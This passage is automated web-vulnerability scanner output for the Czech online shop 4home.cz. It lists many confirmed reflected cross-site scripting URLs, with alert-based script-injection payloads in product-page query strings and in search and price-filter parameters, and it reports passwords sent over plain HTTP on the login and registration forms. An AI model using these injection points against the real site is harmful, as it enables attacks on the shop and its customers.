  603. URL: http://www.4home.cz/protiskluzova-podlozka-do-sprchy/?'"--></style></script><script>alert(0x001164)</script>
  604. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  605. Parameter Name: Query Based
  606. Parameter Type: FullQueryString
  607. Attack Pattern: '"--></style></script><script>alert(0x001164)</script>
  608.  
  609. Severity: Important
  610. Confirmation: Confirmed
  611. URL: http://www.4home.cz/sada-bavlnenych-rucniku-2-kusy/?'"--></style></script><script>alert(0x001165)</script>
  612. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  613. Parameter Name: Query Based
  614. Parameter Type: FullQueryString
  615. Attack Pattern: '"--></style></script><script>alert(0x001165)</script>
  616.  
  617. Severity: Important
  618. Confirmation: Confirmed
  619. URL: http://www.4home.cz/sada-rucniku-ronda-2-kusy/?'"--></style></script><script>alert(0x001167)</script>
  620. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  621. Parameter Name: Query Based
  622. Parameter Type: FullQueryString
  623. Attack Pattern: '"--></style></script><script>alert(0x001167)</script>
  624.  
  625. Severity: Important
  626. Confirmation: Confirmed
  627. URL: http://www.4home.cz/detsky-zupan-jerry-fabrics-cars/?'"--></style></script><script>alert(0x00116F)</script>
  628. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  629. Parameter Name: Query Based
  630. Parameter Type: FullQueryString
  631. Attack Pattern: '"--></style></script><script>alert(0x00116F)</script>
  632.  
  633. Severity: Important
  634. Confirmation: Confirmed
  635. URL: http://www.4home.cz/detska-osuska-mickey-mouse/?'"--></style></script><script>alert(0x001174)</script>
  636. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  637. Parameter Name: Query Based
  638. Parameter Type: FullQueryString
  639. Attack Pattern: '"--></style></script><script>alert(0x001174)</script>
  640.  
  641. Severity: Important
  642. Confirmation: Confirmed
  643. URL: http://www.4home.cz/koupelnova-predlozka-grund-regent-vinova-60x90-cm/?'"--></style></script><script>alert(0x001183)</script>
  644. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  645. Parameter Name: Query Based
  646. Parameter Type: FullQueryString
  647. Attack Pattern: '"--></style></script><script>alert(0x001183)</script>
  648.  
  649. Severity: Important
  650. Confirmation: Confirmed
  651. URL: http://www.4home.cz/detsky-zupan-jerry-fabrics-princezny/?'"--></style></script><script>alert(0x001182)</script>
  652. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  653. Parameter Name: Query Based
  654. Parameter Type: FullQueryString
  655. Attack Pattern: '"--></style></script><script>alert(0x001182)</script>
  656.  
  657. Severity: Important
  658. Confirmation: Confirmed
  659. URL: http://www.4home.cz/koupelnova-predlozka-grund-regent-tmave-modra-60x90cm/?'"--></style></script><script>alert(0x0011DE)</script>
  660. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  661. Parameter Name: Query Based
  662. Parameter Type: FullQueryString
  663. Attack Pattern: '"--></style></script><script>alert(0x0011DE)</script>
  664.  
  665. Severity: Important
  666. Confirmation: Confirmed
  667. URL: http://www.4home.cz/detska-osuska-cars/?'"--></style></script><script>alert(0x0011F6)</script>
  668. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  669. Parameter Name: Query Based
  670. Parameter Type: FullQueryString
  671. Attack Pattern: '"--></style></script><script>alert(0x0011F6)</script>
  672.  
  673. Severity: Important
  674. Confirmation: Confirmed
  675. URL: http://www.4home.cz/hebke-bambusove-rucniky/?'"--></style></script><script>alert(0x001200)</script>
  676. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  677. Parameter Name: Query Based
  678. Parameter Type: FullQueryString
  679. Attack Pattern: '"--></style></script><script>alert(0x001200)</script>
  680.  
  681. Severity: Important
  682. Confirmation: Confirmed
  683. URL: http://www.4home.cz/zupan/?'"--></style></script><script>alert(0x0011FB)</script>
  684. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  685. Parameter Name: Query Based
  686. Parameter Type: FullQueryString
  687. Attack Pattern: '"--></style></script><script>alert(0x0011FB)</script>
  688.  
  689. Severity: Important
  690. Confirmation: Confirmed
  691. URL: http://www.4home.cz/wc-predlozka-grund-regent-vinova-60x50-cm/?'"--></style></script><script>alert(0x001203)</script>
  692. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  693. Parameter Name: Query Based
  694. Parameter Type: FullQueryString
  695. Attack Pattern: '"--></style></script><script>alert(0x001203)</script>
  696.  
  697. Severity: Important
  698. Confirmation: Confirmed
  699. URL: http://www.4home.cz/bambusove-rucniky/?'"--></style></script><script>alert(0x001214)</script>
  700. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  701. Parameter Name: Query Based
  702. Parameter Type: FullQueryString
  703. Attack Pattern: '"--></style></script><script>alert(0x001214)</script>
  704.  
  705. Severity: Important
  706. Confirmation: Confirmed
  707. URL: http://www.4home.cz/textilni-sprchovy-zaves-louka/?'"--></style></script><script>alert(0x001202)</script>
  708. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  709. Parameter Name: Query Based
  710. Parameter Type: FullQueryString
  711. Attack Pattern: '"--></style></script><script>alert(0x001202)</script>
  712.  
  713. Severity: Important
  714. Confirmation: Confirmed
  715. URL: http://www.4home.cz/koupelnova-predlozka-grund-regent-staroruzova-60x90-cm/?'"--></style></script><script>alert(0x00121C)</script>
  716. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  717. Parameter Name: Query Based
  718. Parameter Type: FullQueryString
  719. Attack Pattern: '"--></style></script><script>alert(0x00121C)</script>
  720.  
  721. Severity: Important
  722. Confirmation: Confirmed
  723. URL: http://www.4home.cz/zakarove-rucniky-s-pismenky/?'"--></style></script><script>alert(0x001220)</script>
  724. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  725. Parameter Name: Query Based
  726. Parameter Type: FullQueryString
  727. Attack Pattern: '"--></style></script><script>alert(0x001220)</script>
  728.  
  729. Severity: Important
  730. Confirmation: Confirmed
  731. URL: http://www.4home.cz/masazni-olej/?'"--></style></script><script>alert(0x0013E0)</script>
  732. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  733. Parameter Name: Query Based
  734. Parameter Type: FullQueryString
  735. Attack Pattern: '"--></style></script><script>alert(0x0013E0)</script>
  736.  
  737. Severity: Important
  738. Confirmation: Confirmed
  739. URL: http://www.4home.cz/sampanske-s-jahodou-k-malovani-na-telo/?'"--></style></script><script>alert(0x0013DE)</script>
  740. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  741. Parameter Name: Query Based
  742. Parameter Type: FullQueryString
  743. Attack Pattern: '"--></style></script><script>alert(0x0013DE)</script>
  744.  
  745. Severity: Important
  746. Confirmation: Confirmed
  747. URL: http://www.4home.cz/pirticky-sprchovy-gel-mydlo-pirticky/?'"--></style></script><script>alert(0x00140B)</script>
  748. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  749. Parameter Name: Query Based
  750. Parameter Type: FullQueryString
  751. Attack Pattern: '"--></style></script><script>alert(0x00140B)</script>
  752.  
  753. Severity: Important
  754. Confirmation: Confirmed
  755. URL: http://www.4home.cz/cokolada-k-malovani-na-telo/?'"--></style></script><script>alert(0x001409)</script>
  756. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  757. Parameter Name: Query Based
  758. Parameter Type: FullQueryString
  759. Attack Pattern: '"--></style></script><script>alert(0x001409)</script>
  760.  
  761. Severity: Important
  762. Confirmation: Confirmed
  763. URL: http://www.4home.cz/pirticky-sprchove-gely-pirticky-4-ks/?'"--></style></script><script>alert(0x001412)</script>
  764. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  765. Parameter Name: Query Based
  766. Parameter Type: FullQueryString
  767. Attack Pattern: '"--></style></script><script>alert(0x001412)</script>
  768.  
  769. Severity: Important
  770. Confirmation: Confirmed
  771. URL: http://www.4home.cz/osobni-vaha-concept-vo-2880-digitalni-sklenena-cerna/?'"--></style></script><script>alert(0x00141D)</script>
  772. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  773. Parameter Name: Query Based
  774. Parameter Type: FullQueryString
  775. Attack Pattern: '"--></style></script><script>alert(0x00141D)</script>
  776.  
  777. Severity: Important
  778. Confirmation: Confirmed
  779. URL: http://www.4home.cz/bylinne-kapky-gresik-zivotabudic-50-ml/?'"--></style></script><script>alert(0x001427)</script>
  780. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  781. Parameter Name: Query Based
  782. Parameter Type: FullQueryString
  783. Attack Pattern: '"--></style></script><script>alert(0x001427)</script>
  784.  
  785. Severity: Important
  786. Confirmation: Confirmed
  787. URL: http://www.4home.cz/bylinne-kapky-gresik-stihla-linie-50-ml/?'"--></style></script><script>alert(0x00143C)</script>
  788. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  789. Parameter Name: Query Based
  790. Parameter Type: FullQueryString
  791. Attack Pattern: '"--></style></script><script>alert(0x00143C)</script>
  792.  
  793. Severity: Important
  794. Confirmation: Confirmed
  795. URL: http://www.4home.cz/cistici-bylinne-kapky-gresik-50-ml/?'"--></style></script><script>alert(0x001481)</script>
  796. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  797. Parameter Name: Query Based
  798. Parameter Type: FullQueryString
  799. Attack Pattern: '"--></style></script><script>alert(0x001481)</script>
  800.  
  801. Severity: Important
  802. Confirmation: Confirmed
  803. URL: http://www.4home.cz/cevni-bylinne-kapky-gresik-50-ml/?'"--></style></script><script>alert(0x00148F)</script>
  804. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  805. Parameter Name: Query Based
  806. Parameter Type: FullQueryString
  807. Attack Pattern: '"--></style></script><script>alert(0x00148F)</script>
  808.  
  809. Severity: Important
  810. Confirmation: Confirmed
  811. URL: http://www.4home.cz/gresik-rooibos-5-druhu/?'"--></style></script><script>alert(0x00149D)</script>
  812. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  813. Parameter Name: Query Based
  814. Parameter Type: FullQueryString
  815. Attack Pattern: '"--></style></script><script>alert(0x00149D)</script>
  816.  
  817. Severity: Important
  818. Confirmation: Confirmed
  819. URL: http://www.4home.cz/zestihlujici-pas/?'"--></style></script><script>alert(0x0014A4)</script>
  820. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  821. Parameter Name: Query Based
  822. Parameter Type: FullQueryString
  823. Attack Pattern: '"--></style></script><script>alert(0x0014A4)</script>
  824.  
  825. Severity: Important
  826. Confirmation: Confirmed
  827. URL: http://www.4home.cz/spanelske-musky-s-prichuti/?'"--></style></script><script>alert(0x0014A6)</script>
  828. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  829. Parameter Name: Query Based
  830. Parameter Type: FullQueryString
  831. Attack Pattern: '"--></style></script><script>alert(0x0014A6)</script>
  832.  
  833. Severity: Important
  834. Confirmation: Confirmed
  835. URL: http://www.4home.cz/penovy-podhlavnik/?'"--></style></script><script>alert(0x0014B4)</script>
  836. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  837. Parameter Name: Query Based
  838. Parameter Type: FullQueryString
  839. Attack Pattern: '"--></style></script><script>alert(0x0014B4)</script>
  840.  
  841. Severity: Important
  842. Confirmation: Confirmed
  843. URL: http://www.4home.cz/overball/?'"--></style></script><script>alert(0x0014B6)</script>
  844. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  845. Parameter Name: Query Based
  846. Parameter Type: FullQueryString
  847. Attack Pattern: '"--></style></script><script>alert(0x0014B6)</script>
  848.  
  849. Severity: Important
  850. Confirmation: Confirmed
  851. URL: http://www.4home.cz/masazni-lavove-kameny/?'"--></style></script><script>alert(0x0014C0)</script>
  852. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  853. Parameter Name: Query Based
  854. Parameter Type: FullQueryString
  855. Attack Pattern: '"--></style></script><script>alert(0x0014C0)</script>
  856.  
  857. Severity: Important
  858. Confirmation: Confirmed
  859. URL: http://www.4home.cz/elektronicka-cigareta-ego-t-900mah/?'"--></style></script><script>alert(0x0014EB)</script>
  860. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  861. Parameter Name: Query Based
  862. Parameter Type: FullQueryString
  863. Attack Pattern: '"--></style></script><script>alert(0x0014EB)</script>
  864.  
  865. Severity: Important
  866. Confirmation: Confirmed
  867. URL: http://www.4home.cz/elektronicka-cigareta-ego-t-650mah/?'"--></style></script><script>alert(0x001508)</script>
  868. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  869. Parameter Name: Query Based
  870. Parameter Type: FullQueryString
  871. Attack Pattern: '"--></style></script><script>alert(0x001508)</script>
  872.  
  873. ||| [Possible] Cross-site Scripting
  874.  
  875. Severity: Medium
  876. Confirmation: Confirmed
  877. URL: http://www.4home.cz/hledat/?q=HledanA1 vA1raz&nsextt='"><net sparker=alert(0x0003DF)>
  878. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  879. Parameter Name: nsextt
  880. Parameter Type: Querystring
  881. Attack Pattern: '"><net sparker=netsparker(0x0003DF)>
  882.  
  883. Severity: Medium
  884. Confirmation: Confirmed
  885. URL: http://www.4home.cz/hledat/?q='"><net sparker=alert(0x000464)>
  886. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  887. Parameter Name: q
  888. Parameter Type: Querystring
  889. Attack Pattern: '"><net sparker=netsparker(0x000464)>
  890.  
  891. Severity: Medium
  892. Confirmation: Confirmed
  893. URL: http://www.4home.cz/bytovy-textil/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x000814)>&priceTo=5999&skladem=1&vyprodej=1
  894. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  895. Parameter Name: priceFrom
  896. Parameter Type: Querystring
  897. Attack Pattern: '"><net sparker=netsparker(0x000814)>
  898.  
  899. Severity: Medium
  900. Confirmation: Confirmed
  901. URL: http://www.4home.cz/bytovy-textil/?akce=1&novinky=1&priceFrom=69&priceTo='"><net sparker=alert(0x0008F6)>&skladem=1&vyprodej=1
  902. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  903. Parameter Name: priceTo
  904. Parameter Type: Querystring
  905. Attack Pattern: '"><net sparker=netsparker(0x0008F6)>
  906.  
  907. Severity: Medium
  908. Confirmation: Confirmed
  909. URL: http://www.4home.cz/bytove-doplnky/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x000CA0)>&priceTo=7990&skladem=1&vyprodej=1
  910. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  911. Parameter Name: priceFrom
  912. Parameter Type: Querystring
  913. Attack Pattern: '"><net sparker=netsparker(0x000CA0)>
  914.  
  915. Severity: Medium
  916. Confirmation: Confirmed
  917. URL: http://www.4home.cz/bytove-doplnky/?akce=1&novinky=1&priceFrom=29&priceTo='"><net sparker=alert(0x000EA3)>&skladem=1&vyprodej=1
  918. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  919. Parameter Name: priceTo
  920. Parameter Type: Querystring
  921. Attack Pattern: '"><net sparker=netsparker(0x000EA3)>
  922.  
  923. Severity: Medium
  924. Confirmation: Confirmed
  925. URL: http://www.4home.cz/elektro/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x00107A)>&priceTo=6999&skladem=1&vyprodej=1
  926. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  927. Parameter Name: priceFrom
  928. Parameter Type: Querystring
  929. Attack Pattern: '"><net sparker=netsparker(0x00107A)>
  930.  
  931. Severity: Medium
  932. Confirmation: Confirmed
  933. URL: http://www.4home.cz/elektro/?akce=1&novinky=1&priceFrom=79&priceTo='"><net sparker=alert(0x001190)>&skladem=1&vyprodej=1
  934. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  935. Parameter Name: priceTo
  936. Parameter Type: Querystring
  937. Attack Pattern: '"><net sparker=netsparker(0x001190)>
  938.  
  939. Severity: Medium
  940. Confirmation: Confirmed
  941. URL: http://www.4home.cz/koupelna/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x0012AB)>&priceTo=2995&skladem=1&vyprodej=1
  942. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  943. Parameter Name: priceFrom
  944. Parameter Type: Querystring
  945. Attack Pattern: '"><net sparker=netsparker(0x0012AB)>
  946.  
  947. Severity: Medium
  948. Confirmation: Confirmed
  949. URL: http://www.4home.cz/koupelna/?akce=1&novinky=1&priceFrom=65&priceTo='"><net sparker=alert(0x001435)>&skladem=1&vyprodej=1
  950. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  951. Parameter Name: priceTo
  952. Parameter Type: Querystring
  953. Attack Pattern: '"><net sparker=netsparker(0x001435)>
  954.  
  955. Severity: Medium
  956. Confirmation: Confirmed
  957. URL: http://www.4home.cz/krasa-a-zdravi/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x001544)>&priceTo=3999&skladem=1&vyprodej=1
  958. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  959. Parameter Name: priceFrom
  960. Parameter Type: Querystring
  961. Attack Pattern: '"><net sparker=netsparker(0x001544)>
  962.  
  963. Severity: Medium
  964. Confirmation: Confirmed
  965. URL: http://www.4home.cz/krasa-a-zdravi/?akce=1&novinky=1&priceFrom=49&priceTo='"><net sparker=alert(0x001571)>&skladem=1&vyprodej=1
  966. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  967. Parameter Name: priceTo
  968. Parameter Type: Querystring
  969. Attack Pattern: '"><net sparker=netsparker(0x001571)>
  970.  
  971. ||| Password Transmitted Over HTTP
  972.  
  973. Severity: Important
  974. Confirmation: Confirmed
  975. URL: http://www.4home.cz/registrace/
  976. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  977. Form target action: #loginForm
  978.  
  979. Severity: Important
  980. Confirmation: Confirmed
  981. Detection Accuracy :
  982. URL: http://www.4home.cz/uzivatel/
  983. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  984. Form target action: /uzivatel/#loginForm